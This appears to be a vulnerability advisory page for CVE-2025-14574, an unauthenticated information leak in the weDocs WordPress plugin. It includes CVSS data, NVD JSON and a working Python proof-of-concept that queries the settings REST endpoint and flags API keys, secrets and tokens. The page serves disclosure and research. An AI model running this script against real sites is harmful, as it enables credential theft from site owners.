Security Vulnerability Report
中文
CVE-2025-14574 CVSS 5.3 MEDIUM

CVE-2025-14574

Published: 2026-01-09 07:16:00
Last Modified: 2026-04-15 00:35:42

Description

The weDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.15 via the `/wp-json/wp/v2/docs/settings` REST API endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including third party services API keys.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

weDocs plugin <= 2.1.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-14574 PoC - weDocs Plugin Sensitive Information Disclosure # Target: WordPress site with weDocs plugin <= 2.1.15 def exploit_cve_2025_14574(target_url): """ Exploit for weDocs plugin sensitive information disclosure vulnerability This PoC demonstrates how unauthenticated attackers can extract sensitive data including third-party service API keys from the /wp-json/wp/v2/docs/settings endpoint """ # Target REST API endpoint endpoint = "/wp-json/wp/v2/docs/settings" url = target_url.rstrip('/') + endpoint print(f"[*] Target: {url}") print(f"[*] Exploiting CVE-2025-14574...") try: # Send unauthenticated GET request to the vulnerable endpoint response = requests.get(url, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Success! Sensitive data extracted:") print(json.dumps(data, indent=2)) # Check for API keys and sensitive information sensitive_keys = ['api_key', 'api_secret', 'key', 'secret', 'token', 'password'] for key, value in data.items(): if any(s in key.lower() for s in sensitive_keys): print(f"[!] Found sensitive data: {key}") return data else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None # Example usage # target = "https://example.com" # result = exploit_cve_2025_14574(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14574", "sourceIdentifier": "[email protected]", "published": "2026-01-09T07:16:00.050", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The weDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.15 via the `/wp-json/wp/v2/docs/settings` REST API endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including third party services API keys."}, {"lang": "es", "value": "El plugin weDocs para WordPress es vulnerable a la exposición de información sensible en todas las versiones hasta la 2.1.15, inclusive, a través del endpoint de la API REST `/wp-json/wp/v2/docs/settings`. Esto permite a atacantes no autenticados extraer datos sensibles, incluyendo claves de API de servicios de terceros."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?old_path=/wedocs/tags/2.1.15&new_path=/wedocs/tags/2.1.16#file12", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cbca3d1e-0985-43d3-855e-eee07715f670?source=cve", "source": "[email protected]"}]}}